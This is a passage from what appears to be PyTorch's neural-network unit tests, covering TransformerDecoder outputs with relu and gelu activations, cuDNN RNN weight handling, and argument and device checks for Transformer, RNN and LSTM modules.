return x.transpose(1, 0) if batch_first else x
activation = F.relu
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
decoder_layer = get_a_test_layer(use_cuda=use_cuda, activation=activation,
batch_first=batch_first)
model = nn.TransformerDecoder(decoder_layer, 1).to(device)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]]).to(device)
memory_input = torch.tensor([[[60., 70., 80., 90.]]]).to(device)
result = model(decoder_input, memory_input)
ref_output = torch.tensor(
[[[2.314351, 0.094805, -0.671322, 0.101977]]]).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-3)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]])).to(device)
memory_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]]])).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.422245, 0.051716, -0.606338, -0.024756]],
[[2.422245, 0.051716, -0.606338, -0.024756]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-4)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]])).to(device)
memory_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]])).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.343536, 0.085561, -0.654954, 0.074991]],
[[2.343536, 0.085561, -0.654954, 0.074991]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-4)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]
)).to(device)
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# key_padding_mask
key_padding_mask = torch.zeros(2, 3).to(device) == 1
result = model(decoder_input, memory_input,
tgt_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# key_padding_mask
key_padding_mask[0, 2] = 1
key_padding_mask[1, 1] = 1
key_padding_mask[1, 2] = 1
result = model(decoder_input, memory_input,
tgt_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430025, 0.027643, -0.601164, -0.073476],
[2.4323, 0.029375, -0.599553, -0.071881]],
[[2.428523, 0.026838, -0.602226, -0.07391],
[2.432634, 0.029842, -0.599318, -0.071253]],
[[2.432278, 0.028152, -0.599555, -0.074139],
[2.432659, 0.029244, -0.599294, -0.072382]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# memory_key_padding_mask
key_padding_mask = torch.zeros(2, 5).to(device) == 1
result = model(decoder_input, memory_input,
memory_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# memory_key_padding_mask
key_padding_mask[0, 4] = 1
key_padding_mask[1, 3] = 1
key_padding_mask[1, 4] = 1
result = model(decoder_input,
memory_input,
memory_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.429757, 0.027358, -0.601351, -0.073816],
[2.432692, 0.028583, -0.599263, -0.073634]],
[[2.428247, 0.02662, -0.602419, -0.074123],
[2.432657, 0.029055, -0.599293, -0.072732]],
[[2.431515, 0.027687, -0.600096, -0.074459],
[2.433075, 0.028543, -0.598987, -0.073985]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# multiple layers no norm
model = nn.TransformerDecoder(decoder_layer, 2).to(device)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]]).to(device)
memory_input = torch.tensor([[[60., 70., 80., 90.]]]).to(device)
result = model(decoder_input, memory_input)
ref_output = torch.tensor(
[[[2.31316, 0.0950293, -0.671995, 0.102802]]]).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-3)
# multiple layers no norm
model = nn.TransformerDecoder(decoder_layer, 6).to(device)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]
)).to(device)
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.42794, 0.026164, -0.60263, -0.0747591],
[2.43113, 0.0279516, -0.600376, -0.0736896]],
[[2.42794, 0.026164, -0.60263, -0.0747591],
[2.43113, 0.0279516, -0.600376, -0.0736896]],
[[2.42794, 0.026164, -0.60263, -0.0747591],
[2.43113, 0.0279516, -0.600376, -0.0736896]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# multiple layers with norm
# d_model = 4
norm = nn.LayerNorm(4)
model = nn.TransformerDecoder(decoder_layer, 2, norm=norm).to(device)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]]).to(device)
memory_input = torch.tensor([[[60., 70., 80., 90.]]]).to(device)
result = model(decoder_input, memory_input)
ref_output = torch.tensor(
[[[1.66166, -0.326986, -1.01466, -0.320017]]]).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-3)
# multiple layers with norm
model = nn.TransformerDecoder(decoder_layer, 6, norm=norm).to(device)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]
)).to(device)
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[1.69559, -0.357291, -0.894741, -0.443553],
[1.69571, -0.357363, -0.894154, -0.444196]],
[[1.69559, -0.357291, -0.894741, -0.443553],
[1.69571, -0.357363, -0.894154, -0.444196]],
[[1.69559, -0.357291, -0.894741, -0.443553],
[1.69571, -0.357363, -0.894154, -0.444196]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# gelu activation test cases
activation = "gelu"
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
decoder_layer = get_a_test_layer(use_cuda=use_cuda, activation=activation,
batch_first=batch_first)
model = nn.TransformerDecoder(decoder_layer, 1).to(device)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]]).to(device)
memory_input = torch.tensor([[[60., 70., 80., 90.]]]).to(device)
result = model(decoder_input, memory_input)
ref_output = torch.tensor([[[2.306435, 0.095946, -0.675796, 0.10687]]]).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-3)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]])).to(device)
memory_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]]])).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.415448, 0.054389, -0.610932, -0.0156613]],
[[2.415448, 0.054389, -0.610932, -0.0156613]]])).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-4)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]])).to(device)
memory_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]])).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.338531, 0.087709, -0.65776, 0.080646]],
[[2.338531, 0.087709, -0.65776, 0.080646]]])).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-4)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]
)).to(device)
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.42049104, 0.03443088, -0.60793706, -0.05436271],
[2.42210631, 0.03546578, -0.60679895, -0.05357488]],
[[2.41907674, 0.0336104, -0.60892977, -0.05490462],
[2.42216881, 0.03586554, -0.6067524, -0.05289126]],
[[2.42205716, 0.03488046, -0.60683681, -0.05460596],
[2.42240309, 0.0354595, -0.60659063, -0.05378816]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
@unittest.skipIf(not (TEST_CUDNN and TEST_MULTIGPU), 'CUDNN or multi-gpu not available')
def test_cudnn_rnn_dropout_states_device(self):
rnn = nn.RNN(10, 20, num_layers=2, dropout=.5)
device = 1
input = torch.randn(5, 4, 10).cuda(device)
rnn.cuda(device)
hx = torch.randn(2, 4, 20).cuda(device)
output = rnn(input, hx)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_weight_format(self):
rnns = [
nn.LSTM(10, 20, batch_first=True),
nn.LSTM(10, 20, batch_first=True, proj_size=10),
nn.GRU(10, 20, batch_first=True),
nn.RNN(10, 20, batch_first=True)
]
first_warn = True
for rnn in rnns:
rnn.cuda()
input = torch.randn(5, 4, 10, requires_grad=True, device="cuda")
hx = torch.randn(1, 5, 20, requires_grad=True, device="cuda")
all_vars = [input, hx] + list(rnn.parameters())
if isinstance(rnn, nn.LSTM):
# LSTM with projections has different hx size
if rnn.proj_size > 0:
hx = torch.randn(1, 5, 10, requires_grad=True, device="cuda")
all_vars[1] = hx
cx = torch.randn(1, 5, 20, requires_grad=True, device="cuda")
all_vars[2:2] = [cx]
hx = (hx, cx)
output = rnn(input, hx)
output[0].sum().backward()
grads = [v.grad.data.clone() for v in all_vars]
for v in all_vars:
v.grad.data.zero_()
# Weights will no longer view onto the same chunk of memory
weight = all_vars[4]
weight_data = weight.data.clone()
with torch.no_grad():
weight.set_(weight_data)
for _ in range(2):
with warnings.catch_warnings(record=True) as w:
output_noncontig = rnn(input, hx)
if first_warn:
self.assertEqual(len(w), 1)
self.assertIn('weights are not part of single contiguous chunk of memory', w[0].message.args[0])
first_warn = False
warnings.resetwarnings()
output_noncontig[0].sum().backward()
grads_noncontig = [v.grad.data.clone() for v in all_vars]
for v in all_vars:
v.grad.data.zero_()
self.assertEqual(output, output_noncontig)
self.assertEqual(grads_noncontig, grads)
# Make sure these still share storage
weight_data[:] = 4
self.assertEqual(weight_data, all_vars[4].data)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_cudnn_weight_tying(self):
rnns = [
nn.LSTM(10, 20, batch_first=True, bidirectional=True),
nn.LSTM(10, 20, batch_first=True, bidirectional=True, proj_size=10),
nn.GRU(10, 20, batch_first=True, bidirectional=True),
nn.RNN(10, 20, batch_first=True, bidirectional=True)
]
for rnn in rnns:
rnn.bias_ih_l0_reverse = rnn.bias_ih_l0
rnn.cuda()
input = torch.randn(5, 4, 10, requires_grad=True, device="cuda")
hx = torch.randn(2, 5, 20, requires_grad=True, device="cuda")
all_vars = [input, hx] + list(rnn.parameters())
opt = torch.optim.SGD(rnn.parameters(), lr=0.1)
opt.zero_grad()
if isinstance(rnn, nn.LSTM):
# LSTM with projections has different hx size
if rnn.proj_size > 0:
hx = torch.randn(2, 5, 10, requires_grad=True, device="cuda")
all_vars[1] = hx
cx = torch.randn(2, 5, 20, requires_grad=True, device="cuda")
all_vars[2:2] = [cx]
hx = (hx, cx)
with warnings.catch_warnings(record=True) as w:
output = rnn(input, hx)
output[0].sum().backward()
opt.step()
with warnings.catch_warnings(record=True) as w:
output_cuda = rnn(input, hx)
rnn.cpu()
hx = (hx[0].cpu(), hx[1].cpu()) if isinstance(rnn, nn.LSTM) else hx.cpu()
output_cpu = rnn(input.cpu(), hx)
self.assertEqual(output_cuda, output_cpu)
def test_transformer_args_check(self):
model_name = 'Transformer'
d_model = 128
nhead = 4
num_encoder_layers = 2
num_decoder_layers = 3
dim_feedforward = 65
dropout = 0.3
bsz = 3
seq_len = 35
tgt_len = 15
activations = [F.relu, F.gelu]
wrong_bsz = 7
wrong_d_model = 63
wrong_nhead = 5
wrong_activation = "abc"
def test(encoder_input_shape, decoder_input_shape,
src_mask_len=None, tgt_mask_len=None, memory_mask_size=None,
src_key_padding_mask_size=None, tgt_key_padding_mask_size=None,
memory_key_padding_mask_size=None):
encoder_input = torch.randn(encoder_input_shape)
decoder_input = torch.randn(decoder_input_shape)
model = getattr(nn, model_name)(d_model, nhead, num_encoder_layers,
num_decoder_layers, dim_feedforward, dropout)
if src_mask_len is not None:
src_mask = model.generate_square_subsequent_mask(src_mask_len)
else:
src_mask = None
if tgt_mask_len is not None:
tgt_mask = model.generate_square_subsequent_mask(tgt_mask_len)
else:
tgt_mask = None
if memory_mask_size is not None:
memory_task = torch.rand(memory_mask_size)
else:
memory_task = None
if src_key_padding_mask_size is not None:
src_key_padding_mask = torch.rand(src_key_padding_mask_size) >= 0.5
else:
src_key_padding_mask = None
if tgt_key_padding_mask_size is not None:
tgt_key_padding_mask = torch.rand(tgt_key_padding_mask_size) >= 0.5
else:
tgt_key_padding_mask = None
if memory_key_padding_mask_size is not None:
memory_key_padding_mask = torch.rand(memory_key_padding_mask_size) >= 0.5
else:
memory_key_padding_mask = None
with self.assertRaises(RuntimeError):
model(encoder_input, decoder_input,
src_mask=src_mask,
tgt_mask=tgt_mask,
memory_mask=memory_task,
src_key_padding_mask=src_key_padding_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask)
correct_encoder_input_shape = (seq_len, bsz, d_model)
correct_decoder_input_shape = (tgt_len, bsz, d_model)
def update_shape(shape, dim, new_dim_size):
new_shape = list(shape)
new_shape[dim] = new_dim_size
return tuple(new_shape)
# Incorrect encoder_input batch size
encoder_input_shape = update_shape(correct_encoder_input_shape, 1, wrong_bsz)
decoder_input_shape = correct_decoder_input_shape
test(encoder_input_shape, decoder_input_shape)
# Incorrect decoder_input batch size
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = update_shape(correct_decoder_input_shape, 1, wrong_bsz)
test(encoder_input_shape, decoder_input_shape)
# Incorrect encoder_input input size
encoder_input_shape = update_shape(correct_encoder_input_shape, 2, wrong_d_model)
decoder_input_shape = correct_decoder_input_shape
test(encoder_input_shape, decoder_input_shape)
# Incorrect decoder_input input size
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = update_shape(correct_decoder_input_shape, 2, wrong_d_model)
test(encoder_input_shape, decoder_input_shape)
# Incorrect nhead
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
with self.assertRaises(AssertionError):
model = getattr(nn, model_name)(d_model, wrong_nhead, num_encoder_layers,
num_decoder_layers, dim_feedforward, dropout)
# Incorrect src_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
wrong_src_mask_size = seq_len + 1
test(encoder_input_shape, decoder_input_shape, src_mask_len=wrong_src_mask_size)
# Incorrect tgt_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
wrong_tgt_mask_size = tgt_len + 1
test(encoder_input_shape, decoder_input_shape, tgt_mask_len=wrong_tgt_mask_size)
# Incorrect memory_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
wrong_tgt_mask_size = tgt_len + 1
test(encoder_input_shape, decoder_input_shape,
memory_mask_size=(wrong_tgt_mask_size, wrong_src_mask_size))
# Incorrect src_key_padding_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
with self.assertRaises(AssertionError):
test(encoder_input_shape, decoder_input_shape,
src_key_padding_mask_size=(wrong_bsz, wrong_src_mask_size))
# Incorrect tgt_key_padding_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
with self.assertRaises(AssertionError):
test(encoder_input_shape, decoder_input_shape,
tgt_key_padding_mask_size=(wrong_bsz, wrong_tgt_mask_size))
# Incorrect memory_key_padding_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
with self.assertRaises(AssertionError):
test(encoder_input_shape, decoder_input_shape,
memory_key_padding_mask_size=(wrong_bsz, wrong_src_mask_size))
# Correct activations
for activation in activations:
model = getattr(nn, model_name)(d_model, nhead, num_encoder_layers, num_decoder_layers,
dim_feedforward, dropout, activation)
# Incorrect activation
with self.assertRaises(RuntimeError):
model = getattr(nn, model_name)(d_model, nhead, num_encoder_layers, num_decoder_layers,
dim_feedforward, dropout, wrong_activation)
def test_transformer_layer_args_check(self):
model_names = ['TransformerEncoderLayer', 'TransformerDecoderLayer']
d_model = 128
nhead = 4
dim_feedforward = 65
dropout = 0.3
bsz = 3
seq_len = 35
tgt_len = 15
activations = [F.relu, F.gelu]
wrong_activation = "abc"
encoder_input_shape = (seq_len, bsz, d_model)
decoder_input_shape = (tgt_len, bsz, d_model)
encoder_input = torch.randn(encoder_input_shape)
decoder_input = torch.randn(decoder_input_shape)
for model_name in model_names:
for activation in activations:
model = getattr(nn, model_name)(d_model, nhead, dim_feedforward,
dropout, activation)
# Incorrect activation
for model_name in model_names:
with self.assertRaises(RuntimeError):
model = getattr(nn, model_name)(d_model, nhead, dim_feedforward,
dropout, wrong_activation)
def test_rnn_args_check(self):
input_size = 3
hidden_size = 5
num_layers = 2
batch_size = 4
seq_len = 6
num_directions = 1
bad_size = 7 # prime number so that no size can divide it.
def test(input_shape, hidden_shape, mode):
for input, hidden in get_inputs(input_shape, hidden_shape, mode):
model = getattr(nn, mode)(input_size, hidden_size, num_layers)
self.assertRaises(RuntimeError, lambda: model(input, hidden))
correct_input_shape = (seq_len, batch_size, input_size)
correct_hidden_shape = (num_layers * num_directions, batch_size, hidden_size)
def update_shape(shape, dim, new_dim_size):
new_shape = list(shape)
new_shape[dim] = new_dim_size
return tuple(new_shape)
def get_inputs(input_shape, hidden_shape, mode):
'''returns list( tuple(input, hidden) )
where input, hidden are inputs to a model'''
input = torch.randn(input_shape)
hidden = torch.randn(hidden_shape)
if mode != 'LSTM':
return [(input, hidden)]
if hidden_shape == correct_hidden_shape:
return [(input, (hidden, hidden))]
good_hidden = torch.randn(correct_hidden_shape)
return [
(input, (hidden, good_hidden)),
(input, (good_hidden, hidden)),
]
rnn_modes = ['RNN', 'GRU', 'LSTM']
for mode in rnn_modes:
# Incorrect input batch size
input_shape = update_shape(correct_input_shape, 1, bad_size)
hidden_shape = correct_hidden_shape
test(input_shape, hidden_shape, mode)
# Incorrect hidden batch size
input_shape = correct_input_shape
hidden_shape = update_shape(correct_hidden_shape, 1, bad_size)
test(input_shape, hidden_shape, mode)
# Incorrect input size
input_shape = update_shape(correct_input_shape, 2, bad_size)
hidden_shape = correct_hidden_shape
test(input_shape, hidden_shape, mode)
# Incorrect hidden size
input_shape = correct_input_shape
hidden_shape = update_shape(correct_hidden_shape, 2, bad_size)
test(input_shape, hidden_shape, mode)
# Incorrect hidden[0]
input_shape = correct_input_shape
hidden_shape = update_shape(correct_hidden_shape, 0, bad_size)
test(input_shape, hidden_shape, mode)
def test_projections_lstm_args_check(self):
input_size = 3
hidden_size = 5
proj_size = 2
num_layers = 2
batch_size = 4
seq_len = 6
num_directions = 1
bad_size = 7 # prime number so that no size can divide it.
def test(input_shape, hidden_h_shape, hidden_c_shape):
for input, hidden in get_inputs(input_shape, hidden_h_shape, hidden_c_shape):
model = nn.LSTM(input_size, hidden_size, num_layers, proj_size=proj_size)
self.assertRaises(RuntimeError, lambda: model(input, hidden))
correct_input_shape = (seq_len, batch_size, input_size)
correct_hidden_h_shape = (num_layers * num_directions, batch_size, proj_size)
correct_hidden_c_shape = (num_layers * num_directions, batch_size, hidden_size)
def update_shape(shape, dim, new_dim_size):
new_shape = list(shape)
new_shape[dim] = new_dim_size
return tuple(new_shape)
def get_inputs(input_shape, hidden_h_shape, hidden_c_shape):
'''returns list( tuple(input, hidden) )
where input, hidden are inputs to a model'''
input = torch.randn(input_shape)
hidden_h = torch.randn(hidden_h_shape)
hidden_c = torch.randn(hidden_c_shape)
return [(input, (hidden_h, hidden_c))]
# Incorrect input batch size
input_shape = update_shape(correct_input_shape, 1, bad_size)
test(input_shape, correct_hidden_h_shape, correct_hidden_c_shape)
# Incorrect hidden batch size
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 1, bad_size)
hidden_c_shape = update_shape(correct_hidden_c_shape, 1, bad_size)
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect input size
input_shape = update_shape(correct_input_shape, 2, bad_size)
test(input_shape, correct_hidden_h_shape, correct_hidden_c_shape)
# Incorrect hidden size
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 2, bad_size)
hidden_c_shape = update_shape(correct_hidden_c_shape, 2, bad_size)
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect hidden[0]
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 0, bad_size)
hidden_c_shape = update_shape(correct_hidden_c_shape, 0, bad_size)
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect proj size = hidden size
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 0, hidden_size)
hidden_c_shape = correct_hidden_c_shape
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect proj size != hidden size
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 0, bad_size)
hidden_c_shape = correct_hidden_c_shape
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect cell size != hidden size
input_shape = correct_input_shape
hidden_h_shape = correct_hidden_h_shape
hidden_c_shape = update_shape(correct_hidden_c_shape, 0, bad_size)
test(input_shape, hidden_h_shape, hidden_c_shape)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_rnn_check_device(self):
input_size = 3
hidden_size = 5
num_layers = 2
batch_size = 4
seq_len = 6
num_directions = 1
correct_input_shape = (seq_len, batch_size, input_size)
correct_hidden_shape = (num_layers * num_directions, batch_size, hidden_size)
rnn_modes = ['RNN', 'GRU', 'LSTM']
for mode in rnn_modes:
model = getattr(nn, mode)(input_size, hidden_size, num_layers)
input = torch.randn(correct_input_shape)
hidden = torch.randn(correct_hidden_shape)
# input and weights are not at the same device
with self.assertRaisesRegex(RuntimeError,
"Input and parameter tensors are not at the same device"):
model(input.to('cuda:0'))
# input and hiddens are not at the same device
with self.assertRaisesRegex(RuntimeError,
r"Input and hidden tensors are not at the same device"):
if mode == 'LSTM':
model(input, (hidden.to('cuda:0'), hidden.to('cuda:0')))
else:
model(input, (hidden.to('cuda:0')))
# hidden tensors are not at the same CUDA device
if mode == 'LSTM':
with self.assertRaisesRegex(RuntimeError,
"Input and hidden tensors are not at the same device"):
model(input.to('cuda:0'), (hidden.to('cuda:0'), hidden.to('cuda:1')))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_projections_lstm_check_device(self):
input_size = 3
hidden_size = 5
proj_size = 2
num_layers = 2
batch_size = 4
seq_len = 6
num_directions = 1
correct_input_shape = (seq_len, batch_size, input_size)
correct_hidden_h_shape = (num_layers * num_directions, batch_size, proj_size)
correct_hidden_c_shape = (num_layers * num_directions, batch_size, hidden_size)
model = nn.LSTM(input_size, hidden_size, num_layers, proj_size=proj_size)
input = torch.randn(correct_input_shape)
hidden_h = torch.randn(correct_hidden_h_shape)
hidden_c = torch.randn(correct_hidden_c_shape)
# input and weights are not at the same device
with self.assertRaisesRegex(RuntimeError,
"Input and parameter tensors are not at the same device"):
model(input.to('cuda:0'))
# input and hiddens are not at the same device
with self.assertRaisesRegex(RuntimeError,
r"Input and hidden tensors are not at the same device"):
model(input, (hidden_h.to('cuda:0'), hidden_c.to('cuda:0')))
# hidden tensors are not at the same CUDA device
with self.assertRaisesRegex(RuntimeError,
"Input and hidden tensors are not at the same device"):
model(input.to('cuda:0'), (hidden_h.to('cuda:0'), hidden_c.to('cuda:1')))
def test_rnn_initial_hidden_state(self):
rnn_modes = ['RNN', 'GRU', 'LSTM']
for mode in rnn_modes:
rnn = getattr(nn, mode)(30, 20, 2)
input = torch.randn(10, 32, 30)
hidden = torch.zeros(2, 32, 20)
if mode == 'LSTM':
hidden = (hidden, hidden)
output1, hidden1 = rnn(input, hidden)
output2, hidden2 = rnn(input)
self.assertEqual(output1, output2)
self.assertEqual(hidden1, hidden2)
def test_projections_lstm_initial_hidden_state(self):
for bidir in [False, True]:
rnn = nn.LSTM(30, 20, 2, bidirectional=bidir, proj_size=10)
num_dirs = 2 if bidir else 1
input = torch.randn(10, 32, 30)
hidden_h = torch.zeros(2 * num_dirs, 32, 10)
hidden_c = torch.zeros(2 * num_dirs, 32, 20)
hidden = (hidden_h, hidden_c)
output1, hidden1 = rnn(input, hidden)
output2, hidden2 = rnn(input)
